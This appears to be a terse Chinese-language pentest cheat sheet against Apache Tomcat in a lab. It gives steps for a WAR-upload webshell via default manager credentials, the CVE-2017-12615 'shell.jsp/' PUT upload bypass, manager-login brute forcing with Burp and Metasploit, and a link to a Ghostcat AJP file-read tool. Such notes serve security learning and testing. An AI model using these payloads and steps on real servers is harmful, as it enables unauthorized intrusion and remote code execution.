一、后台war包getshell
漏洞利用:
tomcat在conf/tomcat-users.xml配置用户权限
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<role rolename="manager-gui"/>
<role rolename="manager-script"/>
<role rolename="manager-jmx"/>
<role rolename="manager-status"/>
<role rolename="admin-gui"/>
<role rolename="admin-script"/>
<user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" />
</tomcat-users>
1、构建war包
jar cvf shell.war test.jsp
2、后台页面上传tomcat自动解压war包
http://172.16.20.134:8080/manager/html
3、cknife连接getshell
http://172.16.20.134:8080/shell/test.jsp
二、tomcat任意上传漏洞CVE-2017--12615
漏洞利用:
conf/web.xml处理.jsp 和 .jspx 的时候,是通过JspServlet处理请求的,当.jsp后面有空格的时候交给defaultServlet处理
影响windows linux
1、访问域名抓包
payload:
shell.jsp/
put上传shell.jsp/ 绕过windows,linux。
2、访问域名http://172.16.20.134:8080/test.jsp getshell
三、后台爆破
1、后台base64编码传输
抓包
字段解密为:
payload选择custom itrerator
选择base64编码
点这爆破
msf爆破search tomcat_mgr_login
四.CNVD-2020-10487-Tomcat-Ajp-lfi
Tomcat-Ajp协议文件读取漏洞
工具地址:https://github.com/AdministratorGithub/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py
